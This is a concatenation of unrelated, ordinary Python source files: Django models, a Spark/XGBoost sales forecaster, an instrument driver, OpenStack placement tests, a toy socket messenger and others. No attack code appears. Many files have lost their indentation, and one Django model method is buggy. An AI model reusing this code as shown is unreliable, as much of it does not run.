handler.setLevel(log_level)
server.logger.setLevel(log_level)
server.logger.addHandler(handler)
if debugger:
server.set_debugger(debugger)
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
server.logger.addHandler(handler)
server.logger.setLevel(logging.DEBUG)
server.serve_forever()
server.logger.info('exit')
return server
def import_fortpy():
global fortpy
import fortpy
import fortpy.isense
def add_virtualenv_path(venv=os.getenv('VIRTUAL_ENV')):
"""Add virtualenv's site-packages to `sys.path`."""
if not venv:
return
venv = os.path.abspath(venv)
path = os.path.join(
venv, 'lib', 'python%d.%d' % sys.version_info[:2], 'site-packages')
sys.path.insert(0, path)
site.addsitedir(path)
def main(args=None):
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description=__doc__)
parser.add_argument(
'--address', default='localhost')
parser.add_argument(
'--port', default=0, type=int)
parser.add_argument(
'--port-file', '-f', default='-', type=argparse.FileType('wt'),
help='file to write port on. default is stdout.')
parser.add_argument(
'--sys-path', '-p', default=[], action='append',
help='paths to be inserted at the top of `sys.path`.')
parser.add_argument(
'--virtual-env', '-v', default=[], action='append',
help='paths to be used as if VIRTUAL_ENV is set to it.')
parser.add_argument(
'--log', help='save server log to this file.')
parser.add_argument(
'--log-level',
choices=['CRITICAL', 'ERROR', 'WARN', 'INFO', 'DEBUG'],
help='logging level for log file.')
parser.add_argument(
'--log-traceback', action='store_true', default=False,
help='Include traceback in logging output.')
parser.add_argument(
'--pdb', dest='debugger', const='pdb', action='store_const',
help='start pdb when error occurs.')
parser.add_argument(
'--ipdb', dest='debugger', const='ipdb', action='store_const',
help='start ipdb when error occurs.')
ns = parser.parse_args(args)
fortpy_epc_server(**vars(ns))
if __name__ == '__main__':
main()
|
class Unittest():
def __init__(self, code, language, is_input=True, is_output=True):
self.language = language
self.code = code
self.is_input = is_input
self.is_output = is_output
def get_lang(self):
return self.language
def get_code(self):
return self.code
def get_input(self):
return self.is_input
def get_output(self):
return self.is_output
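
# Minimal usage sketch (illustrative values only):
if __name__ == "__main__":
    t = Unittest("print('hi')", "python", is_input=False)
    print(t.get_lang(), t.get_code(), t.get_input(), t.get_output())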
|
import FWCore.ParameterSet.Config as cms
# TrackerTrajectoryBuilders
from RecoTracker.CkfPattern.CkfTrajectoryBuilder_cff import *
# TrajectoryCleaning
from TrackingTools.TrajectoryCleaning.TrajectoryCleanerBySharedHits_cfi import *
# navigation school
from RecoTracker.TkNavigation.NavigationSchoolESProducer_cff import *
# generate CTF track candidates ############
import RecoTracker.CkfPattern.CkfTrackCandidates_cfi
ckfTrackCandidatesPixelLess = RecoTracker.CkfPattern.CkfTrackCandidates_cfi.ckfTrackCandidates.clone(
TrajectoryBuilderPSet = dict(refToPSet_ = 'GroupedCkfTrajectoryBuilder'),
src = 'globalPixelLessSeeds'
)
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
class ResetPassword(models.Model):
create_date = models.DateField(verbose_name=_('Create date'), auto_now=True)
pwd_hash = models.TextField(verbose_name=_('Hash'))
user = models.OneToOneField(User, verbose_name=_('User'), unique=True)
def __unicode__(self):
return "%s - %s" % user.email, create_date
|
from django.conf.urls import url
from .views import SearchView
app_name = "builds"
urlpatterns = [
url(r"^search/", SearchView.as_view(), name="search"),
]
|
import subprocess
from glob import glob
from os.path import join, dirname, abspath
__all__ = ['mpy_cross', 'run']
mpy_cross = abspath(glob(join(dirname(__file__), 'mpy-cross*'))[0])
def run(*args, **kwargs):
return subprocess.Popen([mpy_cross] + list(args), **kwargs)
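
# Minimal usage sketch (assumes an "example.py" next to the caller; names are illustrative):
#
#   run('--version').wait()     # print the bundled mpy-cross version
#   run('example.py').wait()    # compiles example.py to example.mpy alongside the source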
|
import datetime
from .models import Item, Measurement
def benchmark(func):
fully_qualified_name = func.__module__ + '.' + func.__name__
def timing_function(*args, **kwargs):
start = datetime.datetime.now()
result = func(*args, **kwargs)
end = datetime.datetime.now()
duration = end - start
item, _ = Item.objects.get_or_create(name=fully_qualified_name)
Measurement.objects.create(item=item, time_delta=duration)
return result
return timing_function
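
# Minimal usage sketch (illustrative; assumes the Django app providing Item/Measurement
# is configured and migrated):
#
#   @benchmark
#   def slow_task():
#       return sum(range(10**6))
#
#   slow_task()  # stores one Measurement linked to the Item named "<module>.slow_task"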
|
import socket
import time
while True:
N = input("Who do you want to call? ")
msg = "(UrMum)" + input("What do you want to say? ")
data = msg.encode("UTF-8")
addr = ("Vampy-CS-"+N,8080)
phone = socket.socket()
try:
phone.connect(addr)
phone.send(data)
resp = bytes.decode(phone.recv(1024))
if resp !="r":
print("Whoops.")
phone.close()
time.sleep(.1)
except ConnectionRefusedError:
print("They appear to be offline.")
|
from ask_sdk_model.ui import SimpleCard
from bs4 import BeautifulSoup
from django.template.loader import get_template
from ask_sdk_model.dialog import DelegateDirective
from alexa.request_handler.buildin.cancel_and_stop import cancel_and_stop_request
from alexa.request_handler.buildin.fallback import fallback_request
from core.models import Scenario, ActiveScenario
def in_progress_choose_sceanrio_request(handler_input, minus_points, quit_minus_points):
session_attributes = handler_input.attributes_manager.session_attributes
user = handler_input.request_envelope.context.system.user.user_id
active_scenario = ActiveScenario.objects.get(user=user)
# if box was opened in game
if not session_attributes.get('box') and active_scenario.box:
return cancel_and_stop_request(handler_input, quit_minus_points)
# only ask how many persons will participate if scenario is selected
if not session_attributes.get('scenario'):
try:
slots = handler_input.request_envelope.request.intent.slots
scenario_slot = slots.get('scenario').value if slots.get('scenario') else None
Scenario.objects.get(other_names__contains=scenario_slot) if scenario_slot else None
except Scenario.DoesNotExist:
return fallback_request(handler_input, minus_points, quit_minus_points)
current_intent = handler_input.request_envelope.request.intent
return handler_input.response_builder.add_directive(DelegateDirective(updated_intent=current_intent)).response
else:
return fallback_request(handler_input, minus_points, quit_minus_points)
def choose_sceanrio_request(handler_input, minus_points, quit_minus_points):
"""Handler for Choose Scenario Intent."""
session_attributes = handler_input.attributes_manager.session_attributes
user = handler_input.request_envelope.context.system.user.user_id
slots = handler_input.request_envelope.request.intent.slots
active_scenario = ActiveScenario.objects.get(user=user)
# if box was opened in game
if not session_attributes.get('box') and active_scenario.box:
return cancel_and_stop_request(handler_input, quit_minus_points)
if slots.get('players'):
user_input = (slots.get('players').value)
try:
number_of_players = int(user_input)
except ValueError:
number_of_players = 0
else:
number_of_players = 0
session_attributes['players'] = number_of_players
# if scenario set in session
if not session_attributes.get('scenario'):
# save players
try:
scenario = Scenario.objects.get(
other_names__contains=slots.get('scenario').value if slots.get('scenario') else None
)
session_attributes['scenario'] = scenario.id
speech_text = get_template('skill/close_box.html').render()
return handler_input.response_builder.speak(
speech_text
).set_card(
SimpleCard(
f'Spiel Vorbereitungen',
BeautifulSoup(speech_text, features="html.parser").text
)
).set_should_end_session(
False
).response
except Scenario.DoesNotExist as e:
print('Scenario.DoesNotExist: ', e)
return fallback_request(handler_input, minus_points, quit_minus_points)
except ValueError as e:
print('ValueError: ', e)
return fallback_request(handler_input, minus_points, quit_minus_points)
else:
return fallback_request(handler_input, minus_points, quit_minus_points)
|
#%%
class Kot:
    # def __init__(self, Imie, Kolor_oczu, Kolor_siersci, Dlugosc, Wysokosc, Wiek, Waga):  # class constructor - runs when the object is created
    def __init__(self):  # class constructor - runs when the object is created
self.Imie = ''
self.Kolor_oczu = ''
self.Kolor_siersci = ''
self.Dlugosc = 1
self.Wysokosc = 1
self.Wiek = 9
self.Waga = 6
def mialczenie(self):
print('Miau !')
return "Miau"
def spanie(self):
if self.Wiek == 10:
print('śpi godzinę')
elif self.Wiek>=10:
print('śpi godzinę')
def jedzenie(self):
self.Waga += 10
print('kot dobrze zjadł')
def drapanie(self):
if self.Waga >= 10:
print('szkody są duże')
else:
print('szkody są małe')
# Mialczenie, Jedzenie, Spanie, Drapanie, Mruczenie
# kot1 = Kot('Puszek', 'Zielone', 'Szary', 1.05, 0.95, 5, 5)
# kot2 = Kot('Okruszek', 'Zielono-szare', 'Bury', 0.75, 0.55, 3, 3)
# print(szopa2.Pomaluj())
|
import pytest
from brownie import *
@pytest.fixture
def stable_flash():
yield a[0].deploy(StableFlash, 1000)
@pytest.fixture
def stablecoin():
yield a[0].deploy(StableFlash, 1000)
@pytest.fixture
def another_stablecoin():
yield a[0].deploy(StableFlash, 1000)
@pytest.fixture
def flash_minter():
yield a[0].deploy(FlashMinter)
@pytest.fixture
def fake_minter():
yield a[0].deploy(FakeMinter)
@pytest.fixture
def free_swap():
yield a[0].deploy(FreeSwap) |
# This mock-up is called by ../tests/test_plugin.py
# to verify the behaviour of the plugin infrastructure
def imread(fname, dtype=None):
assert fname == 'test.png'
assert dtype == 'i4'
def imsave(fname, arr):
assert fname == 'test.png'
assert arr == [1, 2, 3]
def imshow(arr, plugin_arg=None):
assert arr == [1, 2, 3]
assert plugin_arg == (1, 2)
def imread_collection(x, conserve_memory=True):
assert conserve_memory == False
assert x == '*.png'
|
from pyspark.ml import Pipeline
from pyspark.ml.evaluation import RegressionEvaluator
from pyspark.ml.feature import VectorAssembler, StringIndexer
from pyspark.ml.tuning import *
from pyspark.sql import DataFrame, SparkSession
from pyspark.sql.functions import udf, col, avg
from pyspark.sql.types import IntegerType, FloatType
from collections import namedtuple
import sys
import math
from pyspark_xgboost.xgboostestimator import XGBoostEstimator
SalesRecord = namedtuple("SalesRecord", ["storeId", "daysOfWeek", "date", "sales", "customers",
"open", "promo", "stateHoliday", "schoolHoliday"])
Store = namedtuple("Store", ["storeId", "storeType", "assortment", "competitionDistance",
"competitionOpenSinceMonth", "competitionOpenSinceYear", "promo2",
"promo2SinceWeek", "promo2SinceYear", "promoInterval"])
def parseStoreFile(storeFilePath):
isHeader = True
storeInstances = []
f = open(storeFilePath, "r")
for line in f.readlines():
if isHeader:
isHeader = False
else:
try:
strArray = line.split(",")
if len(strArray) == 10:
storeIdStr, storeTypeStr, assortmentStr, competitionDistanceStr,competitionOpenSinceMonthStr,\
competitionOpenSinceYearStr, promo2Str,promo2SinceWeekStr, promo2SinceYearStr, promoIntervalStr = line.split(",")
store = Store(int(storeIdStr), storeTypeStr, assortmentStr,
-1 if (competitionDistanceStr == "") else int(competitionDistanceStr),
-1 if (competitionOpenSinceMonthStr == "") else int(competitionOpenSinceMonthStr),
-1 if (competitionOpenSinceYearStr == "") else int(competitionOpenSinceYearStr),
int(promo2Str),
-1 if (promo2Str == "0") else int(promo2SinceWeekStr),
-1 if (promo2Str == "0") else int(promo2SinceYearStr),
promoIntervalStr.replace("\"", ""))
storeInstances.append(store)
else:
storeIdStr, storeTypeStr, assortmentStr, competitionDistanceStr,\
competitionOpenSinceMonthStr, competitionOpenSinceYearStr, promo2Str,\
promo2SinceWeekStr, promo2SinceYearStr, firstMonth, secondMonth, thirdMonth,\
forthMonth = line.split(",")
store = Store(int(storeIdStr), storeTypeStr, assortmentStr,
-1 if (competitionDistanceStr == "") else int(competitionDistanceStr),
-1 if (competitionOpenSinceMonthStr == "") else int(competitionOpenSinceMonthStr),
-1 if (competitionOpenSinceYearStr == "") else int(competitionOpenSinceYearStr),
int(promo2Str),
-1 if (promo2Str == "0") else int(promo2SinceWeekStr),
-1 if (promo2Str == "0") else int(promo2SinceYearStr),
firstMonth.replace("\"", "") + "," + secondMonth + "," + thirdMonth + "," + \
forthMonth.replace("\"", ""))
storeInstances.append(store)
except Exception as e:
print(e)
sys.exit(1)
f.close()
return storeInstances
def parseTrainingFile(trainingPath):
isHeader = True
records = []
f = open(trainingPath, "r")
for line in f.readlines():
if isHeader:
isHeader = False
else:
storeIdStr, daysOfWeekStr, dateStr, salesStr, customerStr, openStr, promoStr,\
stateHolidayStr, schoolHolidayStr = line.split(",")
salesRecord = SalesRecord(int(storeIdStr), int(daysOfWeekStr), dateStr,
int(salesStr), int(customerStr), int(openStr), int(promoStr), stateHolidayStr,
schoolHolidayStr)
records.append(salesRecord)
f.close()
return records
def featureEngineering(ds):
stateHolidayIndexer = StringIndexer()\
.setInputCol("stateHoliday")\
.setOutputCol("stateHolidayIndex")
schoolHolidayIndexer = StringIndexer()\
.setInputCol("schoolHoliday")\
.setOutputCol("schoolHolidayIndex")
storeTypeIndexer = StringIndexer()\
.setInputCol("storeType")\
.setOutputCol("storeTypeIndex")
assortmentIndexer = StringIndexer()\
.setInputCol("assortment")\
.setOutputCol("assortmentIndex")
promoInterval = StringIndexer()\
.setInputCol("promoInterval")\
.setOutputCol("promoIntervalIndex")
filteredDS = ds.filter(ds.sales > 0).filter(ds.open > 0)
# parse date
dateUdf = udf(lambda dateStr: int(dateStr.split("-")[2]), IntegerType())
dsWithDayCol = filteredDS.withColumn("day", dateUdf(col("date")))
monthUdf = udf(lambda dateStr: int(dateStr.split("-")[1]), IntegerType())
dsWithMonthCol = dsWithDayCol.withColumn("month", monthUdf(col("date")))
yearUdf = udf(lambda dateStr: int(dateStr.split("-")[0]), IntegerType())
dsWithYearCol = dsWithMonthCol.withColumn("year", yearUdf(col("date")))
salesUdf = udf(lambda sales: math.log(sales), FloatType())
dsWithLogSales = dsWithYearCol.withColumn("logSales", salesUdf(col("sales")))
# fill with mean values
meanCompetitionDistance = float(dsWithLogSales.select(avg("competitionDistance")).first()[0])
print("===={}".format(meanCompetitionDistance))
distanceUdf = udf(lambda distance: float(distance) if (distance > 0) else meanCompetitionDistance, FloatType())
finalDS = dsWithLogSales.withColumn("transformedCompetitionDistance",
distanceUdf(col("competitionDistance")))
vectorAssembler = VectorAssembler()\
.setInputCols(["storeId", "daysOfWeek", "promo", "competitionDistance", "promo2", "day",
"month", "year", "transformedCompetitionDistance", "stateHolidayIndex",
"schoolHolidayIndex", "storeTypeIndex", "assortmentIndex", "promoIntervalIndex"])\
.setOutputCol("features")
pipeline = Pipeline(stages=[stateHolidayIndexer, schoolHolidayIndexer,
storeTypeIndexer, assortmentIndexer,promoInterval, vectorAssembler])
return pipeline.fit(finalDS)\
.transform(finalDS).\
drop("stateHoliday", "schoolHoliday", "storeType", "assortment", "promoInterval", "sales",
"promo2SinceWeek", "customers", "promoInterval", "competitionOpenSinceYear",
"competitionOpenSinceMonth", "promo2SinceYear", "competitionDistance", "date")
def crossValidation(xgboostParam, trainingData):
xgbEstimator = XGBoostEstimator(xgboostParam)\
.setFeaturesCol("features")\
.setLabelCol("logSales")
paramGrid = ParamGridBuilder() \
.addGrid(xgbEstimator.num_round, [20, 50])\
.addGrid(xgbEstimator.eta, [0.1, 0.4])\
.build()
tv = TrainValidationSplit()\
.setEstimator(xgbEstimator)\
.setEvaluator(RegressionEvaluator().setLabelCol("logSales"))\
.setEstimatorParamMaps(paramGrid)\
.setTrainRatio(0.8)
return tv.fit(trainingData)
def main(trainingPath, storeFilePath):
sparkSession = SparkSession.builder.appName("rosseman").getOrCreate()
allSalesRecords = parseTrainingFile(trainingPath)
salesRecordsDF = sparkSession.createDataFrame(allSalesRecords)
allStores = parseStoreFile(storeFilePath)
storesDS = sparkSession.createDataFrame(allStores)
fullDataset = salesRecordsDF.join(storesDS, "storeId")
featureEngineeredDF = featureEngineering(fullDataset)
params = {}
params["eta"] = 0.1
params["max_depth"] = 6
params["silent"] = 1
params["ntreelimit"] = 1000
params["objective"] = "reg:linear"
params["subsample"] = 0.8
params["num_round"] = 100
bestModel = crossValidation(params, featureEngineeredDF)
return bestModel
if __name__ == "__main__":
bestModel = main(sys.argv[1], sys.argv[2])
|
import logging
from qcodes.instrument.parameter import Parameter, ManualParameter
from qcodes.utils.validators import Enum
from .FEMTO_OE300_base import (OE300State, OE300Error, LOW_NOISE_GAINS, HIGH_SPEED_GAINS,
LP_SETTINGS, COUPLING_MODES, GAIN_SETTINGS, ERROR_TABLE,
OE300Base)
log = logging.getLogger(__name__)
class OE300BaseParam(Parameter):
def __init__(self, name, instrument, vals, nbits, **kwargs):
super().__init__(name=name, instrument=instrument, vals=vals, **kwargs)
self._raw_value = 0
self._nbits = nbits
def get_raw(self): # pylint: disable=method-hidden
return self.raw_value_to_value(self._raw_value)
def set_raw(self, value): # pylint: disable=method-hidden
self._raw_value = self.value_to_raw_value(value)
def value_to_raw_value(self, value):
return self.vals._valid_values.index(value)
def raw_value_to_value(self, raw_value):
return self.vals._valid_values[raw_value]
def make_bits(self):
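        # Return the raw value as a zero-padded binary string of self._nbits bits.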
return f'{self._raw_value:0{self._nbits}b}'
class OE300GainMode(OE300BaseParam):
def set_raw(self, value): # pylint: disable=method-hidden
gains = LOW_NOISE_GAINS if value == 'L' else HIGH_SPEED_GAINS
self._instrument.gain.vals = Enum(*gains)
super().set_raw(value)
class OE300Manual(OE300Base):
"""
A driver for the FEMTO OE300 photodiode, controlled manually.
"""
def __init__(self, name, cal_path=None, prefactor=1, **kwargs):
super().__init__(name, cal_path, prefactor, **kwargs)
self.add_parameter('gain',
label='Gain',
vals=Enum(*LOW_NOISE_GAINS),
nbits=3,
parameter_class=OE300BaseParam)
self.add_parameter('coupling',
label='Coupling',
vals=Enum(*COUPLING_MODES),
nbits=1,
parameter_class=OE300BaseParam)
self.add_parameter('gain_mode',
label='Gain mode',
vals=Enum(*GAIN_SETTINGS),
nbits=1,
parameter_class=OE300GainMode)
self.add_parameter('lp_filter_bw',
label='Lowpass filter bandwidth',
vals=Enum(*LP_SETTINGS),
nbits=2,
parameter_class=OE300BaseParam)
log.info('Manually controlled OE300 initialization complete')
def get_idn(self):
vendor = 'FEMTO'
model = None
serial = None
firmware = None
return {'vendor': vendor, 'model': model,
'serial': serial, 'firmware': firmware}
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_config import fixture as config_fixture
from oslotest import output
import six
import testtools
from placement.cmd import manage
from placement import conf
class TestCommandParsers(testtools.TestCase):
def setUp(self):
super(TestCommandParsers, self).setUp()
self.conf = cfg.ConfigOpts()
conf_fixture = config_fixture.Config(self.conf)
self.useFixture(conf_fixture)
conf.register_opts(conf_fixture.conf)
# Quiet output from argparse (used within oslo_config).
# If you are debugging, commenting this out might be useful.
self.output = self.useFixture(
output.CaptureOutput(do_stderr=True, do_stdout=True))
# We don't use a database, but we need to set the opt as
# it's required for a valid config.
conf_fixture.config(group="placement_database", connection='sqlite://')
command_opts = manage.setup_commands(conf_fixture)
# Command line opts must be registered on the conf_fixture, otherwise
# they carry over globally.
conf_fixture.register_cli_opts(command_opts)
def test_commands_associated(self):
"""Test that commands get parsed as desired.
This leaves out --version, which is built into oslo.config's handling.
"""
for command, args in [
('db_version', ['db', 'version']),
('db_sync', ['db', 'sync']),
('db_stamp', ['db', 'stamp', 'b4ed3a175331']),
('db_online_data_migrations',
['db', 'online_data_migrations'])]:
with mock.patch('placement.cmd.manage.DbCommands.' +
command) as mock_command:
self.conf(args, default_config_files=[])
self.conf.command.func()
mock_command.assert_called_once_with()
def test_non_command(self):
"""A non-existent command should fail."""
self.assertRaises(SystemExit,
self.conf, ['pony'], default_config_files=[])
def test_empty_command(self):
"""An empty command should create no func."""
# Python 2.7 and 3.x behave differently here, but the result is
# satisfactory. Both result in some help output, but the Python 3
# help is better.
def parse_conf():
self.conf([], default_config_files=[])
def get_func():
return self.conf.command.func
if six.PY2:
self.assertRaises(SystemExit, parse_conf)
else:
parse_conf()
self.assertRaises(cfg.NoSuchOptError, get_func)
def test_too_many_args(self):
self.assertRaises(SystemExit,
self.conf, ['version', '5'], default_config_files=[])
self.output.stderr.seek(0)
self.assertIn("choose from 'db'", self.output.stderr.read())
def test_help_message(self):
"""Test that help output for sub commands shows right commands."""
# This is noisy because we have different 'help' behaviors in
# Python 2 and 3.
if six.PY2:
self.assertRaises(SystemExit, self.conf, ['db'],
default_config_files=[])
else:
self.conf(['db'], default_config_files=[])
self.conf.command.func()
self.output.stdout.seek(0)
self.output.stderr.seek(0)
if six.PY2:
self.assertIn('{sync,version,stamp,online_data_migrations}',
self.output.stderr.read())
else:
self.assertIn('{sync,version,stamp,online_data_migrations}',
self.output.stdout.read())
class TestDBCommands(testtools.TestCase):
def setUp(self):
super(TestDBCommands, self).setUp()
self.conf = cfg.ConfigOpts()
conf_fixture = config_fixture.Config(self.conf)
self.useFixture(conf_fixture)
conf.register_opts(conf_fixture.conf)
conf_fixture.config(group="placement_database", connection='sqlite://')
command_opts = manage.setup_commands(conf_fixture)
conf_fixture.register_cli_opts(command_opts)
self.output = self.useFixture(
output.CaptureOutput(do_stderr=True, do_stdout=True))
def _command_setup(self, max_count=None):
command_list = ["db", "online_data_migrations"]
if max_count is not None:
command_list.extend(["--max-count", str(max_count)])
self.conf(command_list,
project='placement',
default_config_files=None)
return manage.DbCommands(self.conf)
def test_online_migrations(self):
# Mock two online migrations
mock_mig1 = mock.MagicMock(__name__="mock_mig_1")
mock_mig2 = mock.MagicMock(__name__="mock_mig_2")
mock_mig1.side_effect = [(10, 10), (0, 0)]
mock_mig2.side_effect = [(15, 15), (0, 0)]
mock_migrations = (mock_mig1, mock_mig2)
with mock.patch('placement.cmd.manage.online_migrations',
new=mock_migrations):
commands = self._command_setup()
commands.db_online_data_migrations()
expected = '''\
Running batches of 50 until complete
10 rows matched query mock_mig_1, 10 migrated
15 rows matched query mock_mig_2, 15 migrated
+------------+-------------+-----------+
| Migration | Total Found | Completed |
+------------+-------------+-----------+
| mock_mig_1 | 10 | 10 |
| mock_mig_2 | 15 | 15 |
+------------+-------------+-----------+
'''
self.output.stdout.seek(0)
self.assertEqual(expected, self.output.stdout.read())
def test_online_migrations_error(self):
good_remaining = [50]
def good_migration(context, count):
found = good_remaining[0]
done = min(found, count)
good_remaining[0] -= done
return found, done
bad_migration = mock.MagicMock()
bad_migration.side_effect = Exception("Mock Exception")
bad_migration.__name__ = 'bad'
mock_migrations = (bad_migration, good_migration)
with mock.patch('placement.cmd.manage.online_migrations',
new=mock_migrations):
# bad_migration raises an exception, but it could be because
# good_migration had not completed yet. We should get 1 in this
# case, because some work was done, and the command should be
# reiterated.
commands = self._command_setup(max_count=50)
self.assertEqual(1, commands.db_online_data_migrations())
# When running this for the second time, there's no work left for
# good_migration to do, but bad_migration still fails - should
# get 2 this time.
self.assertEqual(2, commands.db_online_data_migrations())
# When --max-count is not used, we should get 2 if all possible
# migrations completed but some raise exceptions
commands = self._command_setup()
good_remaining = [125]
self.assertEqual(2, commands.db_online_data_migrations())
def test_online_migrations_bad_max(self):
commands = self._command_setup(max_count=-2)
self.assertEqual(127, commands.db_online_data_migrations())
commands = self._command_setup(max_count="a")
self.assertEqual(127, commands.db_online_data_migrations())
commands = self._command_setup(max_count=0)
self.assertEqual(127, commands.db_online_data_migrations())
def test_online_migrations_no_max(self):
with mock.patch('placement.cmd.manage.DbCommands.'
'_run_online_migration') as rm:
rm.return_value = {}, False
commands = self._command_setup()
self.assertEqual(0, commands.db_online_data_migrations())
def test_online_migrations_finished(self):
with mock.patch('placement.cmd.manage.DbCommands.'
'_run_online_migration') as rm:
rm.return_value = {}, False
commands = self._command_setup(max_count=5)
self.assertEqual(0, commands.db_online_data_migrations())
def test_online_migrations_not_finished(self):
with mock.patch('placement.cmd.manage.DbCommands.'
'_run_online_migration') as rm:
rm.return_value = {'mig': (10, 5)}, False
commands = self._command_setup(max_count=5)
self.assertEqual(1, commands.db_online_data_migrations())
|
#!/usr/bin/env python3
"""
Make a Windows batch file for building ca65 Pently.
Usage:
make clean && make -n COMSPEC=cmd pently.nes | tools/makewinbuild.py
"""
import sys
prolog = """@echo off
echo Building from batch file
@echo on
"""
linesuffix = " || goto :error\n"
epilog = """goto EOF
:error
echo Failed with error #%errorlevel%.
pause
"""
lines = [prolog]
for line in sys.stdin:
words = line.split()
if words[0] in ("touch", "rm") or words[0].startswith("make["):
continue
if words[0] == "python3":
words[0] = "py -3"
if words[0] == "cat":
lpart, rpart = line.replace("/", "\\").split(">", 1)
words = lpart.split()
words = ["copy /b", "+".join(words[1:]), rpart.strip()]
lines.append(" ".join(words) + linesuffix)
lines.append(epilog)
with open("winbuild.bat", "w", newline="\r\n") as outfp:
outfp.writelines(lines)
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpgradeDatabaseDetails(object):
"""
Details for upgrading a database to a specific Oracle Database version.
"""
#: A constant which can be used with the action property of a UpgradeDatabaseDetails.
#: This constant has a value of "PRECHECK"
ACTION_PRECHECK = "PRECHECK"
#: A constant which can be used with the action property of a UpgradeDatabaseDetails.
#: This constant has a value of "UPGRADE"
ACTION_UPGRADE = "UPGRADE"
#: A constant which can be used with the action property of a UpgradeDatabaseDetails.
#: This constant has a value of "ROLLBACK"
ACTION_ROLLBACK = "ROLLBACK"
def __init__(self, **kwargs):
"""
Initializes a new UpgradeDatabaseDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param action:
The value to assign to the action property of this UpgradeDatabaseDetails.
Allowed values for this property are: "PRECHECK", "UPGRADE", "ROLLBACK"
:type action: str
:param database_upgrade_source_details:
The value to assign to the database_upgrade_source_details property of this UpgradeDatabaseDetails.
:type database_upgrade_source_details: oci.database.models.DatabaseUpgradeSourceBase
"""
self.swagger_types = {
'action': 'str',
'database_upgrade_source_details': 'DatabaseUpgradeSourceBase'
}
self.attribute_map = {
'action': 'action',
'database_upgrade_source_details': 'databaseUpgradeSourceDetails'
}
self._action = None
self._database_upgrade_source_details = None
@property
def action(self):
"""
**[Required]** Gets the action of this UpgradeDatabaseDetails.
The database upgrade action.
Allowed values for this property are: "PRECHECK", "UPGRADE", "ROLLBACK"
:return: The action of this UpgradeDatabaseDetails.
:rtype: str
"""
return self._action
@action.setter
def action(self, action):
"""
Sets the action of this UpgradeDatabaseDetails.
The database upgrade action.
:param action: The action of this UpgradeDatabaseDetails.
:type: str
"""
allowed_values = ["PRECHECK", "UPGRADE", "ROLLBACK"]
if not value_allowed_none_or_none_sentinel(action, allowed_values):
raise ValueError(
"Invalid value for `action`, must be None or one of {0}"
.format(allowed_values)
)
self._action = action
@property
def database_upgrade_source_details(self):
"""
Gets the database_upgrade_source_details of this UpgradeDatabaseDetails.
:return: The database_upgrade_source_details of this UpgradeDatabaseDetails.
:rtype: oci.database.models.DatabaseUpgradeSourceBase
"""
return self._database_upgrade_source_details
@database_upgrade_source_details.setter
def database_upgrade_source_details(self, database_upgrade_source_details):
"""
Sets the database_upgrade_source_details of this UpgradeDatabaseDetails.
:param database_upgrade_source_details: The database_upgrade_source_details of this UpgradeDatabaseDetails.
:type: oci.database.models.DatabaseUpgradeSourceBase
"""
self._database_upgrade_source_details = database_upgrade_source_details
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
import numpy as np
import re
def main():
grid = np.zeros((1000,1000))
countCollision = 0
filename = 'day3_1_input.txt'
claims = []
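    # Keep a list of all claim ids; whenever two claims overlap on the grid, both ids
    # are removed, so only claims that never collide remain at the end.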
userInput = open(filename, 'r')
for line in userInput:
#print(line)
m = re.search("\\#(\d+) \\@ (\d+),(\d+): (\d+)x(\d+)", line)
idx = int(m.group(1))
startX = int(m.group(2))
startY = int(m.group(3))
sizeX = int(m.group(4))
sizeY = int(m.group(5))
claims.append(idx)
#print ("startX", startX)
#print ("startY", startY)
#print ("sizeX", sizeX)
#print ("sizeY", sizeY)
for x in range(startX,startX + sizeX):
for y in range(startY,startY + sizeY):
if (grid[x][y] != 0):
if idx in claims:
claims.remove(idx)
if grid[x][y] in claims:
claims.remove(grid[x][y])
grid[x][y] = idx
print (claims)
main()
|
import json
import torch
import numpy as np
from . import utils
from PIL import Image
from torch.utils.data.dataset import Dataset
from pathlib import Path
class DataLoaderRBV(Dataset):
def __init__(self, folder_path, use_gt):
super(DataLoaderRBV, self).__init__()
self.info_files = list(Path(folder_path).glob("**/info.json"))
self.label_files = []
for info_file in self.info_files:
filename = "gray_mask.png" if use_gt else "predicted_mask.png"
self.label_files.append(
info_file.parent / Path(filename)
)
def __getitem__(self, index):
info_path = self.info_files[index]
label_path = self.label_files[index]
with open(info_path) as f:
rbv8 = np.asarray(json.load(f)["norm_rbv"])
label = utils.process_label(Image.open(label_path))
# Generate 1x1, 2x2, 4x4 RBVs from 8x8
rbv1, rbv2, rbv4 = utils.downsample_rbv(rbv8)
rbv1 = torch.from_numpy(rbv1).flatten().float()
rbv2 = torch.from_numpy(rbv2).flatten().float()
rbv4 = torch.from_numpy(rbv4).flatten().float()
rbv8 = torch.from_numpy(rbv8).flatten().float()
return label, rbv1, rbv2, rbv4, rbv8
def __len__(self):
return len(self.info_files)
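# Illustrative usage (hypothetical folder layout containing info.json files):
#
# dataset = DataLoaderRBV('data/train', use_gt=True)
# label, rbv1, rbv2, rbv4, rbv8 = dataset[0]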
|
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from allennlp.modules.elmo import Elmo, batch_to_ids
options_file = "https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json"
